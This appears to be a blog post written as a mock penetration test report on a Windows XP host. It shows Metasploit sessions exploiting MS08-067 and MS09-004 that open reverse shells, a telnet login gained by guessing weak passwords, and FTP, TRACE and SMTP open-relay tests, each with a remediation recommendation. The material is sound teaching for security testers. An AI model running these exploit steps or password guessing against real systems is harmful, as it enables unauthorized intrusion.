mock – pentest one

Title: Pentest Results
Date of Testing: 1433-02-01
Assigned To: Client A
Number of Critical issues: 2
Number of High issues: 4
Name of Tester: MyExploitHQ

——————————————————

Nmap Results:

root@bt:~# nmap -sS -sC -sV --open Client-IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1433-02-01 12:19 BST
Nmap scan report for Client-IP-Address
Host is up (0.00033s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE      VERSION

21/tcp   open  ftp          Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

23/tcp   open  telnet       Microsoft Windows XP telnetd

25/tcp   open  smtp         Microsoft ESMTP 6.0.2600.5512
| smtp-commands: PC.name.com Hello [Tester-IP-Address], SIZE 2097152, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY

80/tcp   open  http         Microsoft IIS httpd 5.1
|_http-title: Directory Listing Denied
| http-methods: Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_See http://nmap.org/nsedoc/scripts/http-methods.html

135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
443/tcp  open  https?
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds

1027/tcp open  msrpc        Microsoft Windows RPC
1433/tcp open  ms-sql-s     Microsoft SQL Server 2005 9.00.1399.00; RTM

MAC Address: 01:02:03:0a:0b:0c (Mickey Systems)
Service Info: Host: PC.name.com; OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_nbstat: NetBIOS name: PC, NetBIOS user: <unknown>, NetBIOS MAC: 01:02:03:0a:0b:0c (Mickey Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: PC
|   Domain name: name.com
|   Forest name: name.com
|   FQDN: PC.name.com
|   NetBIOS computer name: PC
|   NetBIOS domain name: name
|_  System time: 1433-02-01 12:19:39 UTC+1
| ms-sql-info:
|   Windows server name: PC
|   [Client-IP-Address\SQLEXPRESS]
|     Instance name: SQLEXPRESS
|     Version: Microsoft SQL Server 2005 RTM
|       Version number: 9.00.1399.00
|       Product: Microsoft SQL Server 2005
|       Service pack level: RTM
|       Post-SP patches applied: No
|     TCP port: 1433
|_    Clustered: No

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds

------------------------------------------------------

Manual testing:

------------------------------------------------------

Microsoft Security Bulletin MS08-067 - Critical
Vulnerability in Server Service Could Allow Remote Code Execution (958644

1. Windows XP + 445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds = metasploit-ms08_067_netapi

msf > use windows/smb/ms08_067_netapi

msf  exploit(ms08_067_netapi) > set lhost  Tester-IP-Address

msf  exploit(ms08_067_netapi) > set rhost Client-IP-Address

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on Tester-IP-Address:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to Client-IP-Address
[*] Meterpreter session 1 opened (Tester-IP-Address:4444 -> Client-IP-Address:1046) at 1433-02-01 12:23:29 +0100

meterpreter > shell
Process 3728 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Priority: Critical

Recommendation: Apply the MS08-067 update immediately and review and install all other security updates as recommended by vendor.

------------------------------------------------------

Microsoft Security Bulletin MS09-004 - Important
Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420)

2. 1433/tcp open  ms-sql-s Microsoft SQL Server 2005 9.00.1399.00; RTM = metasploit-mssql-ms09_004_sp_replwritetovarbin

msf  exploit(ms09_004_sp_replwritetovarbin) > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin

msf  exploit(ms09_004_sp_replwritetovarbin) > set lhost  Tester-IP-Address

msf  exploit(ms09_004_sp_replwritetovarbin) > set rhost Client-IP-Address

msf  exploit(ms09_004_sp_replwritetovarbin) > exploit

[*] Started reverse handler on Tester-IP-Address:4444
[*] Attempting automatic target detection...
[*] Automatically detected target "MSSQL 2005 SP0 (9.00.1399.06)"
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (752128 bytes) to Client-IP-Address
[*] Meterpreter session 2 opened (Tester-IP-Address:4444 -> Client-IP-Address:1053) at 1433-02-01 12:26:12 +0100

meterpreter > shell
Process 2324 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Priority: Critical

Recommendation: Apply the MS09-004 update immediately and review and install all other security updates as recommended by vendor.

------------------------------------------------------

3. Testing for HTTP Methods and XST (OWASP-CM-008)

Nmap discoverd 80/tcp   open  http         Microsoft IIS httpd 5.1
|_http-title: Directory Listing Denied
| http-methods: Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPA

root@bt:~# telnet Client-IP-Address 80
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
OPTIONS / HTTP/1.1
Host: Client-IP-Address

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 01 Jan 1433 11:36:38 GMT
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private

Testing Trace proves positive as seen bellow by the response mirroring Host: Client-IP-Address in the reply.

root@bt:~# telnet Client-IP-Address 80
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
TRACE / HTTP/1.1
Host: Client-IP-Address

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 01 Jan 1433 11:38:37 GMT
Content-Type: message/http
Content-Length: 42

TRACE / HTTP/1.1
Host: Client-IP-Address

Priority: High

Recommendation: Install Microsoft UrlScan Security Tool. The urlscan.ini file included as part of URLScan sets by default a configuration setting "UseAllowVerbs=1".  In the [AllowVerbs] section of the ini file, http methods GET, HEAD, and POST are the only ones listed, so simply by installing URLScan, you are protected from TRACE or TRACK.

------------------------------------------------------

4. Testing Anonymous FTP

Nmap discoverd 21/tcp   open  ftp          Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

Using Firefox browsing ftp://Client-IP-Address/ is not meet with any restrictions.

------------------------------------------------------

5. Using Metasploit to test FTP

msf > use  auxiliary/scanner/ftp/anonymous

msf  auxiliary(anonymous) > set rhosts Client-IP-Address

msf  auxiliary(anonymous) > run

[*] Client-IP-Address:21 Anonymous READ (220 Microsoft FTP Service)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Priority: High

Recommendation: If FTP file share access is not required disable the service. If required restrict source IP address access to the service.

------------------------------------------------------

6. Testing telnet access

Nmap discoverd 23/tcp   open  telnet       Microsoft Windows XP telnetd

root@bt:~# telnet Client-IP-Address
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: administrator
password: password
Logon failure: unknown user name or bad password.

Login Failed

login: administrator
password: Password
Logon failure: unknown user name or bad password.

Login Failed

login: administrator
password: p@ssw0rd

*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\Documents and Settings\>C:\Documents and Settings\>

Priority: High

Recommendation: Enforce strong password policy. If remote command line access is required use SSH over telnet as traffic is encrypted.

------------------------------------------------------

7. Testing smtp access

Nmap discoverd 25/tcp   open  smtp         Microsoft ESMTP 6.0.2600.5512
| smtp-commands: PC.name.com Hello [Tester-IP-Address], SIZE 2097152, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY

root@bt:~# telnet Client-IP-Address 25
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
220 PC.name.com Microsoft ESMTP MAIL Service, Version: 6.0.2600.5512 ready at  Thu, 01 Jan 1433 13:27:19 +0100

helo

250 PC.name.com Hello [Tester-IP-Address]

mail from:test@mail-test.com

50 2.1.0 test@mail-test.com....Sender OK

rcpt to:test@frogme.com

250 2.1.5 test@frogme.com

data

354 Start mail input; end with <CRLF>.<CRLF>

subject: TEST

test
.

250 2.6.0 <PCeMxB00000001@PC.name.com> Queued mail for delivery

quit

221 2.0.0 PC.name.com Service closing transmission channel

Connection closed by foreign host.

Priority: High

Recommendation: Relay is enabled and requires to be restricted

Administrative Tools / Internet Information Services / local computer / Default SMTP Virtual Server – right click Properties / Access tab / Relay… (Options here)

If you see 550 5.7.1 Unable to relay for test@frogme.com = Relay set to Only list below. This will block the ability to send spam.

——————————————————

For more information:

https://myexploit.wordpress.com/information-gathering-nmap/

http://www.myexploit.wordpress.com/control-metasploit-ms08_067_netapi/

http://www.myexploit.wordpress.com/control-metasploit-auxiliary_scanner_http/

http://www.myexploit.wordpress.com/control-metasploit-ftp_login/

http://www.myexploit.wordpress.com/control-metasploit-mssql-ms09_004_sp_replwritetovarbin/

3 thoughts on “mock – pentest one

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s